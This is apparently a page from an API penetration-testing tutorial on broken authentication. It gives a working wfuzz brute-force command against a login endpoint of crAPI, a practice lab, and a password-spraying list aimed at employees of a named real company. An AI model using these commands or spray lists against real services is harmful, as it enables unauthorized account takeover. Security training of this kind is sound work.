Broken Authentication

API2-Broken Authentication

Authentication Bypass: Password Brute-Force Attacks and Password Spraying

Password Brute-Force Attacks:

Tools and Wordlists:

  • Mentalist App: (https://github.com/sc0tfree/mentalist)

  • Common User Passwords Profiler (CUPP): (https://github.com/Mebus/cupp)

  • Wordlist: An example of a popular wordlist is rockyou.txt. It's often available on Kali Linux and can be unzipped using gzip -d /usr/share/wordlists/rockyou.txt.gz.

Performing a Brute-Force Attack with Wfuzz:

  1. Preparation:

    • Unzip the wordlist (rockyou.txt) if needed.

  2. Using Wfuzz:

    • Check the Wfuzz help menu to understand available options:

      wfuzz --help

    • Important options for API testing include:

      • Headers option (-H)

      • Hide responses options (--hc, --hl, --hw, --hh)

      • POST body requests (-d)

  3. Crafting the Wfuzz Attack:

    • Specify the content-type headers for the API (e.g., Content-Type: application/json for crAPI).

    • Define the POST body for the login endpoint, where FUZZ is the attack position:

      wfuzz -d '{"email":"a@email.com","password":"FUZZ"}' -H 'Content-Type: application/json' -z file,/usr/share/wordlists/rockyou.txt -u http://127.0.0.1:8888/identity/api/auth/login --hc 405

    • In this example, the attack checks for valid passwords against the login endpoint, and irrelevant responses (status code 405) are hidden.

  4. Reviewing Results:

    • Analyze the results, looking for valid passwords. Successful attempts will show responses with a 200 status code.

Password Spraying:

Password Spraying Strategies:

  1. Simple Passwords:

    • Use easily guessable passwords that meet basic requirements (e.g., QWER!@#$, Password1!).

  2. Target-Related Passwords:

    • Create passwords related to the target, including a capitalized letter, a number, details about the organization, and a symbol.

    • Example password-spraying list for Twitter employees:

      Summer2022!
Spring2022!
QWER!@#
March212006!
July152006!
Twitter@2022
JPD1976!
Dorsey@2022

Maximizing User List:

  • The key to password spraying is to maximize the user list, increasing the chances of compromising a user account with a weak password.

  • Build a user list during reconnaissance or by exploiting vulnerabilities like excessive data exposure.

Note on Base64 Encoding:

  • Some APIs may base64-encode authentication payloads.

  • If an API encodes to base64, adjust fuzzing attacks to include base64 payloads using tools like Burp Suite Intruder, which can encode and decode base64 values.

  • Base64 encoding does not enhance security and is often done for encoding comparison on the backend.

PreviousBroken Object Level Authorization (BOLA)NextEvasive Maneuvers

Last updated